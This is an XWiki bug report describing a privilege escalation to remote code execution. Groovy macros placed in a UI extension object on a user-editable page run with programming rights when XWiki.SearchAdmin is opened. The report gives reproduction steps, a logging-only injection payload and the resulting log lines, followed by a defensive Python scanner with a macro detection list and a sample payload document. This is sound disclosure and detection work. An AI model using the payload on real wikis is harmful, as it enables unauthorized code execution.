XWiki Platform / XWIKI-21200

RCE from account through SearchAdmin





      Steps to reproduce:

      1. Edit your user profile (or any other document) with the objects editor.
      2. Add an object of type XWiki.UIExtensionClass
      3. Set "Extension Point Id" to "org.xwiki.platform.search"
      4. Set "Extension ID" to
        {{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack from extension id succeeded!"){{/groovy}}{{/async}}
      5. Set "Extension Parameters" to
        label={{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack from label succeeded!"){{/groovy}}{{/async}}
      6. Set "Extension Scope" to "Current User"
      7. Click Save.
      8. Open the page XWiki.SearchAdmin (e.g., on http://localhost:8080/xwiki/bin/view/XWiki/SearchAdmin)

      Expected result:

      Either only the default database and Solr search engines are listed under "Default search engine", or the full entered label is displayed. Also, no error log message is displayed.

      Actual result:

      An empty option is displayed in the search engine selection, and the following log messages are displayed:

      2023-08-02 15:28:53,572 [org.xwiki.rendering.async.internal.AsyncRendererJob@13f37da2([async, macro, xwiki:XWiki.SearchAdmin, 241, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchAdmin, 375])] ERROR attacker                       - Attack from extension id succeeded! 
      2023-08-02 15:28:53,572 [org.xwiki.rendering.async.internal.AsyncRendererJob@240f13c6([async, macro, xwiki:XWiki.SearchAdmin, 246, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchAdmin, 376])] ERROR attacker                       - Attack from label succeeded! 

      This shows that we've gained programming rights from a simple user account with edit right on just a single page, such as the user profile (which the user can edit by default).

      From the code, this seems to have been introduced in XWIKI-8746, i.e., in XWiki 4.5RC1.
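Because the malicious object can sit on any page the user is allowed to edit, a defender wants to hunt for it across the whole wiki rather than only on XWiki.SearchAdmin. The following scanner is an added example written for this report (it is not code from the XWiki project or from the reporter): it walks an XWiki document XML export (the per-page XML inside a XAR) and flags every XWiki.UIExtensionClass object whose extension id or parameters open a wiki macro, since those fields are meant to hold plain identifiers, not wiki syntax. The field names extensionPointId, name, parameters and scope are assumed from XWiki's export format, the macro list is this example's own judgement, and the sample document is constructed for the demonstration.

```python
"""Flag XWiki.UIExtensionClass objects whose plain-text fields carry wiki
macro syntax, scanning an XWiki document XML export (XAR content) offline."""
import re
import sys
import xml.etree.ElementTree as ET

UIX_CLASS = "XWiki.UIExtensionClass"
# Field names assumed from XWiki's document XML export (assumption for this
# example): the extension id lives in <name>, the parameters in <parameters>.
# Neither field is supposed to be rendered as wiki syntax.
PLAIN_TEXT_FIELDS = ("name", "parameters")

# "{{" opens a macro in XWiki 2.x syntax. Closing tags such as {{/groovy}}
# are skipped because the regex requires a letter right after the braces.
MACRO_RE = re.compile(r"\{\{\s*([A-Za-z][\w-]*)")
# Macros that execute code or pull in other content. {{async}} is listed
# because the report's log lines show it running under the author of
# XWiki.SearchAdmin rather than under the author of the object.
SCRIPT_MACROS = {"groovy", "velocity", "python", "async", "include", "display"}


def find_macros(text):
    """Return the names of the macros opened in text, in order, lower-cased."""
    return [m.group(1).lower() for m in MACRO_RE.finditer(text or "")]


def scan_document(xml_text):
    """Return one finding per UIExtensionClass field that opens a macro."""
    root = ET.fromstring(xml_text)
    doc_ref = f"{root.findtext('web')}.{root.findtext('name')}"
    findings = []
    for obj in root.findall("object"):
        if obj.findtext("className") != UIX_CLASS:
            continue
        # Each <property> wraps exactly one child element named after the field.
        props = {child.tag: (child.text or "")
                 for prop in obj.findall("property") for child in prop}
        for field in PLAIN_TEXT_FIELDS:
            macros = find_macros(props.get(field))
            if not macros:
                continue
            findings.append({
                "document": doc_ref,
                "author": root.findtext("author"),
                "object_number": obj.findtext("number"),
                "extension_point": props.get("extensionPointId"),
                "scope": props.get("scope"),
                "field": field,
                "macros": macros,
                "severity": "high" if set(macros) & SCRIPT_MACROS else "medium",
            })
    return findings


def format_finding(f):
    return (f"[{f['severity'].upper()}] {f['document']} object #{f['object_number']} "
            f"({f['extension_point']}, scope={f['scope']}, author={f['author']}): "
            f"field '{f['field']}' opens macros {f['macros']}")


# Constructed sample: a user-profile document carrying one object shaped like
# the report's payload and one benign extension on the same extension point.
SAMPLE_DOC = """<xwikidoc version="1.4" reference="XWiki.mallory" locale="">
  <web>XWiki</web>
  <name>mallory</name>
  <author>xwiki:XWiki.mallory</author>
  <object>
    <name>XWiki.mallory</name>
    <number>0</number>
    <className>XWiki.UIExtensionClass</className>
    <property><extensionPointId>org.xwiki.platform.search</extensionPointId></property>
    <property><name>{{async}}{{groovy}}services.logging.getLogger("attacker").error("x"){{/groovy}}{{/async}}</name></property>
    <property><parameters>label={{async}}{{groovy}}println 1{{/groovy}}{{/async}}</parameters></property>
    <property><scope>user</scope></property>
  </object>
  <object>
    <name>XWiki.mallory</name>
    <number>1</number>
    <className>XWiki.UIExtensionClass</className>
    <property><extensionPointId>org.xwiki.platform.search</extensionPointId></property>
    <property><name>org.xwiki.platform.search.example</name></property>
    <property><parameters>label=Example engine</parameters></property>
    <property><scope>user</scope></property>
  </object>
</xwikidoc>
"""

if __name__ == "__main__":
    # Pass a path to an exported document XML, or run without arguments to
    # scan the constructed sample above.
    source = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_DOC
    for finding in scan_document(source):
        print(format_finding(finding))
```

Run it over every document XML in a full wiki export; the benign object above produces no finding, while the payload object yields two high-severity findings (one for the extension id, one for the parameters), each reporting the object's author and scope so the owner can be identified. This is a detection aid only; it does not replace the rendering fix in XWiki itself.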


              Michael Hamann